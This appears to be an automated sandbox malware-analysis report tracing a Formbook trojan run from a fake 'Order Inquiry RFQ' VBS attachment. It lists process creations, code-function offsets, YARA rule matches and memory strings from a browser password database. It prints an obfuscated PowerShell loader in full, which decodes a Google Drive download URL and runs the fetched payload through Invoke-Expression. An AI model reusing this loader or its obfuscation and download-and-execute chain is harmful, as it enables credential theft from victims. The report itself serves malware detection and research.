          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21998DBF10_2_21998DBF
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2199FDC010_2_2199FDC0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2197ADE010_2_2197ADE0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_2198AD0010_2_2198AD00
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A37D7310_2_21A37D73
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21983D4010_2_21983D40
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A31D5A10_2_21A31D5A
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A20CB510_2_21A20CB5
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A3FCF210_2_21A3FCF2
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21970CF210_2_21970CF2
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21980C0010_2_21980C00
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219F9C3210_2_219F9C32
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21981F9210_2_21981F92
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A3FFB110_2_21A3FFB1
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21972FC810_2_21972FC8
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A3FF0910_2_21A3FF09
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219A0F3010_2_219A0F30
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219C2F2810_2_219C2F28
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_219F4F4010_2_219F4F40
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21992E9010_2_21992E90
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21989EB010_2_21989EB0
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A3CE9310_2_21A3CE93
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A3EEDB10_2_21A3EEDB
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21A3EE2610_2_21A3EE26
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 10_2_21980E5910_2_21980E59
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeCode function: 11_2_03A5DBC211_2_03A5DBC2
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeCode function: 11_2_03A6432211_2_03A64322
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeCode function: 11_2_03A5D9A211_2_03A5D9A2
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeCode function: 11_2_03A5D99D11_2_03A5D99D
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeCode function: 11_2_03A6614211_2_03A66142
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeCode function: 11_2_03A7C83211_2_03A7C832
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exeCode function: 11_2_03A5BC4211_2_03A5BC42
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02EB12ED12_2_02EB12ED
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E2D2F012_2_02E2D2F0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E2B2C012_2_02E2B2C0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E902C012_2_02E902C0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E152A012_2_02E152A0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02EB027412_2_02EB0274
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02ED03E612_2_02ED03E6
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E1E3F012_2_02E1E3F0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02DFD34C12_2_02DFD34C
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02ECA35212_2_02ECA352
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02EC132D12_2_02EC132D
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02EC70E912_2_02EC70E9
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02ECF0E012_2_02ECF0E0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E170C012_2_02E170C0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02EBF0CC12_2_02EBF0CC
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02EC81CC12_2_02EC81CC
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02ED01AA12_2_02ED01AA
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E1B1B012_2_02E1B1B0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02EDB16B12_2_02EDB16B
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E4516C12_2_02E4516C
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02DFF17212_2_02DFF172
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E9815812_2_02E98158
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E0010012_2_02E00100
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02EAA11812_2_02EAA118
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E2C6E012_2_02E2C6E0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02EC16CC12_2_02EC16CC
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E0C7C012_2_02E0C7C0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02ECF7B012_2_02ECF7B0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E1077012_2_02E10770
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E3475012_2_02E34750
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02EBE4F612_2_02EBE4F6
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E0146012_2_02E01460
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02EC244612_2_02EC2446
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02ECF43F12_2_02ECF43F
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02EAD5B012_2_02EAD5B0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02ED059112_2_02ED0591
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02EC757112_2_02EC7571
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E1053512_2_02E10535
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02EBDAC612_2_02EBDAC6
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E55AA012_2_02E55AA0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02EADAAC12_2_02EADAAC
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E0EA8012_2_02E0EA80
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E83A6C12_2_02E83A6C
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02ECFA4912_2_02ECFA49
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02EC7A4612_2_02EC7A46
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E85BF012_2_02E85BF0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E4DBF912_2_02E4DBF9
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E2FB8012_2_02E2FB80
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02ECFB7612_2_02ECFB76
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02ECAB4012_2_02ECAB40
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E138E012_2_02E138E0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E3E8F012_2_02E3E8F0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02DF68B812_2_02DF68B8
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E1284012_2_02E12840
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E1A84012_2_02E1A840
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E7D80012_2_02E7D800
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E129A012_2_02E129A0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02EDA9A612_2_02EDA9A6
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E2696212_2_02E26962
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E1995012_2_02E19950
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E2B95012_2_02E2B950
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02ECEEDB12_2_02ECEEDB
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E19EB012_2_02E19EB0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E22E9012_2_02E22E90
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02ECCE9312_2_02ECCE93
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E10E5912_2_02E10E59
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02ECEE2612_2_02ECEE26
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E02FC812_2_02E02FC8
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E8EFA012_2_02E8EFA0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02ECFFB112_2_02ECFFB1
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E11F9212_2_02E11F92
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E84F4012_2_02E84F40
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E52F2812_2_02E52F28
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E30F3012_2_02E30F30
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E00CF212_2_02E00CF2
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02ECFCF212_2_02ECFCF2
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02EB0CB512_2_02EB0CB5
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E89C3212_2_02E89C32
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E10C0012_2_02E10C00
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E0ADE012_2_02E0ADE0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E2FDC012_2_02E2FDC0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E28DBF12_2_02E28DBF
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02EC7D7312_2_02EC7D73
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E13D4012_2_02E13D40
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02EC1D5A12_2_02EC1D5A
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02E1AD0012_2_02E1AD00
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_003A196012_2_003A1960
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_003A31D012_2_003A31D0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_003BB6E012_2_003BB6E0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_0039C85012_2_0039C850
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_0039C84B12_2_0039C84B
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_0039CA7012_2_0039CA70
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_0039AAF012_2_0039AAF0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_003A4FF012_2_003A4FF0
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02C2038C12_2_02C2038C
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02C2E30312_2_02C2E303
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02C2E1E412_2_02C2E1E4
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02C2E69C12_2_02C2E69C
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02C2D70812_2_02C2D708
          Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 12_2_02C2C9B312_2_02C2C9B3
          Source: C:\Windows\SysWOW64\ktmutil.exe, Code function: String function: 02DFB970 appears 247 times
          Source: C:\Windows\SysWOW64\ktmutil.exe, Code function: String function: 02E45130 appears 36 times
          Source: C:\Windows\SysWOW64\ktmutil.exe, Code function: String function: 02E8F290 appears 103 times
          Source: C:\Windows\SysWOW64\ktmutil.exe, Code function: String function: 02E7EA12 appears 86 times
          Source: C:\Windows\SysWOW64\ktmutil.exe, Code function: String function: 02E57E54 appears 93 times
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe, Code function: String function: 2196B970 appears 248 times
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe, Code function: String function: 219FF290 appears 103 times
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe, Code function: String function: 219B5130 appears 36 times
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe, Code function: String function: 219C7E54 appears 85 times
          Source: C:\Program Files (x86)\Windows Mail\wabmig.exe, Code function: String function: 219EEA12 appears 84 times
          Source: Order Inquiry RFQ #278823_pdf.vbs, Initial sample: Strings found which are bigger than 50
          Source: 0000000C.00000002.2981736437.0000000000940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000E.00000002.2981468701.0000000001200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000C.00000002.2981799081.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000A.00000002.2447450866.0000000022690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000A.00000002.2446978661.00000000216E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: classification engine, Classification label: mal100.troj.spyw.expl.evad.winVBS@20/8@6/5
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Roaming\Ildprve.Fok
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Mutant created: NULL
          Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7528:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v45leudp.4xr.ps1
          Source: unknown, Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order Inquiry RFQ #278823_pdf.vbs"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7512
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7944
          Source: C:\Windows\System32\wscript.exe, File read: C:\Users\user\Desktop\desktop.ini
          Source: C:\Windows\System32\wscript.exe, Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: ktmutil.exe, 0000000C.00000003.2613458504.0000000000898000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 0000000C.00000002.2980525001.0000000000898000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Debrief klargoeringstekniker overmortgaged Kernefrugterne chewers underrealises #>;$Nethes='Regreskravenes';<#hertugdoemmer Accessionernes Vitaminisering senvy #>;$Hawse=$host.PrivateData;If ($Hawse) {$Justerkammer++;}function Bisulc($supernumerary){$Frstestyrmand=$supernumerary.Length-$Justerkammer;for( $Entremess=3;$Entremess -lt $Frstestyrmand;$Entremess+=4){$Bar+=$supernumerary[$Entremess];}$Bar;}function Brdnidens($Naturaliseredes){ .($spectrographic) ($Naturaliseredes);}$Brnehospitalerne=Bisulc 'LocMDraoBrnz Tji M,l Fal la T /Ga,5Tan. f0Bog Vea(PilWDi iselnv ndD mo,alwslassta stNsanT To gro1Ov 0,et.Fac0Ov ;.to NonWCuri atnUnd6N,c4 Ch; ci ArbxUd,6For4Kn,;she HarNonv Fa:Non1N,n2fla1Mar.Naz0H m),ul MaG Cae axc nok H.oOps/ Ac2 lo0Teg1 uk0N n0slh1Vir0 Bo1hum stuF koiU tr kePelf .uo caxEw./ e1Bar2bol1Lan.pol0s,n ';$Paplike=Bisulc 'EndU epsH,uEs.bRshr-DepANa g K eAlgNN at Al ';$Overconfidences=Bisulc 'equhBultElstKiupsyssfra: .o/J.h/ sodK.nrBrni mav oeIsl.selgDemo A.ori,gKillsabeUnc. CacLsbo MumThe/Hu.u omcE g?ArbeHeixbilpDecoHemrUndtBla= ChdsnioFulwIndn uplTagoCema,oidDid&BaiiB uddom= .e1cyc-HarMIn 5FerLFu z UnL,ollsp,VTh hLaag Brmsam9End2 Re1KorZTigw selZe uNav8 arI ArQ.if3Te w.atK PrOHo u DiCMi 8innUWhi8ConqCornsal ';$Corbovinum=Bisulc ' sp>Tai ';$spectrographic=Bisulc 'suci NoE VeXpel ';$accretive='Aphanozygous';$Tilvrelsens = Bisulc '.useB nc Fohe nosc Gli%rimaUfop P.p.irdPelaY.ut rea il% ul\ ,oIHa.lBaadH rp A r onvHisePal. ppFThuoForkUn. Tr&Tvr& P Cue RucIndh.ncoTa. Fartink ';Brdnidens (Bisulc 'Uin$Vocg lvlMedoOscb raAx ls,i:AliR rivUdle empAffeFl,lcirsskoe PonMare re=Gru( rc P.msupd U. 
Ind/UndcUnd He $BilT BriProlBenvKalrdryeL,nlTetsupae klnMetsIsd)Din ');Brdnidens (Bisulc 'Int$geogDoklDe oskrbPr as ml Dr:,nhL IngHeteTr dDesoskimConms de C npatsB.r= Co$FryOAervDreeVanrConcKeloNonnAnafTr,iTvidCateTownGuacRuseUngsI.d.stas.urp bol Peic stPhy(War$st.CConoTelrsambBr oskuvTakiCurn houNonmPer)sce ');Brdnidens (Bisulc 'Ple[parN.ide,iltDek. ens sue Anr TevCriidolc BaeforPfiro Uaisemn Trt .mM Mia onnForasubg FleHalr in]Ir : U :BlisResePhoc stucirrBesiGrntWhuyIncP.inr Ego PatAf.oTrvcUn,oEnelEnt .at= Tu G [PelNCr,eslatArm. PosBa eG ocMa uArbrDo iscutBefysprPVelr C ostytDisos rcslaostil aaT atyEmipaxse Wa] Re:Dry:I.mTAl.lsessNe 1Pas2 .l ');$Overconfidences=$Lgedommens[0];$Continuums= (Bisulc ' wi$CepG DuL aroBagBNonA alL,em: CaMC laKn c H,RBliOEliRBruhse iUafNHjsUEugs o2Wi,1Fo,8o s=Moun Ave HyWM d- dfo KabPreJ.hoeBanCMexTIm EnrsDu yGevssipt U e ,uMOce.FolnMacE P T Un.BajwKylEE sBC lCD.dLOmdiUrbE ExNDa T');$Continuums+=$Rvepelsene[1];Brdnidens ($Continuums);Brdnidens (Bisulc 'cal$O aMAn a pcPlar Beo ntrDivhCroiPernsocuD ssB,r2 e1 Pl8 Os.sikHVe,e TraPupdKo eBearCtesRat[ Ec$InsPRa,aHygpLoblHaeiLolk GueO e]Tru=Uaf$Ut B s.rskrnsele H hKo oVers grpForiMant FraVillO.seMi rH.inPlaeMis ');$Kardinalen=Bisulc 'C,r$GruMClaaModc
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ildprve.Fok && echo t"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^"
          Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ildprve.Fok && echo t"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wabmig.exe "C:\Program Files (x86)\windows mail\wabmig.exe"
          Source: C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe Process created: C:\Windows\SysWOW64\ktmutil.exe "C:\Windows\SysWOW64\ktmutil.exe"
          Source: unknown Process created: C:\Program Files (x86)\Windows Mail\wabmig.exe "C:\Program Files (x86)\windows mail\wabmig.exe"
          Source: C:\Windows\SysWOW64\ktmutil.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
          Source: unknown Process created: C:\Program Files (x86)\Windows Mail\wabmig.exe "C:\Program Files (x86)\windows mail\wabmig.exe"
          Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell command line, repeated from the first entry above]
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ildprve.Fok && echo t"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" [obfuscated PowerShell command line, repeated from the first entry above]
          Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: wbemcomn.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
          Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
